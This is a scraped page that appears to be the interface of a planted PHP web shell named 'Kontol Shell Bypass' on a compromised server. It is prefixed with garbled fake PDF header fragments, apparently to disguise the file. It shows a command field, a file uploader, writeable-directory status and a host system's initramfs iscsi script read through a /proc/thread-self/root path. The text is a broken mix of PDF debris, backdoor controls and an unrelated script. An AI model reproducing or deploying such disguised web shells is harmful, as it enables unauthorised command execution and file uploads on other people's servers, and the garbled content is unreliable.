%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /proc/thread-self/root/proc/thread-self/root/usr/share/initramfs-tools/scripts/local-bottom/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //proc/thread-self/root/proc/thread-self/root/usr/share/initramfs-tools/scripts/local-bottom/iscsi
#!/bin/sh
# If iscsiuio is present in the initramfs, and it was started by us,
# stop it again so the system iscsiuio can take over later.
if [ -x /sbin/iscsiuio ] && [ -e /run/initramfs/iscsiuio.pid ] ; then
	start-stop-daemon --stop --quiet --retry=TERM/10/KILL/5 \
		--pidfile /run/initramfs/iscsiuio.pid \
		--name iscsiuio --exec /sbin/iscsiuio || :
fi

# Remove the interface file if no disks are present
if [ -f /run/initramfs/open-iscsi.interface ] ; then
	found=0
	for disk in /dev/disk/by-path/*-iscsi-*; do
		if [ ! -e "$disk" ] ; then
			# If we have no matches, we stil go through the for loop once with
			# the pattern as a string
			continue
		fi
		if ! readlink -f "$disk" > /dev/null ; then
			continue
		fi
		found=1
		break;
	done
	if [ $found = 0 ] ; then
		rm /run/initramfs/open-iscsi.interface
	fi
fi

exit 0

Kontol Shell Bypass